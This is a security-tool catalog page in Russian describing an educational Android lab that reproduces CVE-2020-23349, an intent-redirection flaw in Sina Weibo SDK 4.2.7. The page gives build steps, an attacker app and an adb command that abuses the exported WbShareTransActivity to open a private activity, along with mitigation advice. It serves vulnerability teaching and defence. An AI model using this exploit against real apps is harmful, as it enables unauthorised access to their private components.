Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-23349_Lab — Обучающая Android-лаборатория для CVE-2020-23349 в Sina Weibo SDK 4.2.7 | Kitploit
Инструменты/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Безопасность AndroidАнализ уязвимостейЭксплуатацияПентестинг мобильных приложенийМобильная безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Обучающая Android-лаборатория для CVE-2020-23349 в Sina Weibo SDK 4.2.7

Репозиторий
101 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-23349 Android Lab

Учебный проект для локального воспроизведения уязвимости Intent Redirection в Sina Weibo Android SDK 4.2.7.

Используйте только на разрешённых тестовых устройствах или эмуляторах. Не используйте его против реальных пользовательских приложений.

Состав

  • victim: уязвимое приложение, включающее настоящий openDefault-4.2.7.aar
  • attacker: атакующее приложение, вызывающее exported WbShareTransActivity
  • victim/.../PrivateActivity: целевой компонент воспроизведения с android:exported="false"

Поток уязвимости выглядит следующим образом:

root@kitploit:~
Attacker 앱
  -> exported WbShareTransActivity
  -> Intent Extra의 startActivity/gotoActivity
  -> victim의 PrivateActivity 실행

Сборка

Требуются Android SDK 36 и JDK 17.

root@kitploit:~
./gradlew clean assembleDebug

Создаваемые файлы:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

Установка и воспроизведение

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. При необходимости запустите приложение Victim один раз.
  2. В приложении Attacker нажмите кнопку Launch private Activity.
  3. Если появится экран EXPLOIT SUCCESS, воспроизведение прошло успешно.

Можно также воспроизвести атаку напрямую через ADB.

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

Почему это работает

SDK 4.2.7 доверяет строкам startActivity и gotoActivity из внешнего Intent и использует их следующим образом:

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

Поскольку this — это Context приложения Victim, Android считает, что приложение Victim запускает свой собственный private Activity.

В современных сборках Android нужно явно указывать android:exported, поэтому в этом проекте в victim/AndroidManifest.xml явно задано значение true, чтобы воспроизвести неявное состояние exported из старого SDK.

Практика по смягчению

В упражнениях, где функция публикации не нужна, измените следующее значение на false и пересоберите проект:

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

После этого та же атака будет заблокирована исключением SecurityException. В реальном продукте следует удалить Weibo SDK 4.x и обновиться до последней поддерживаемой версии.

Источник SDK

Включённый AAR взят из коммита 4.2.7 официального публичного репозитория Sina Weibo.

  • Репозиторий: https://github.com/sinaweibosdk/weibo_android_sdk
  • Коммит: 99daf8a (4.2.7)
  • Файл: 新文档/openDefault-4.2.7.aar
Скачать инструмент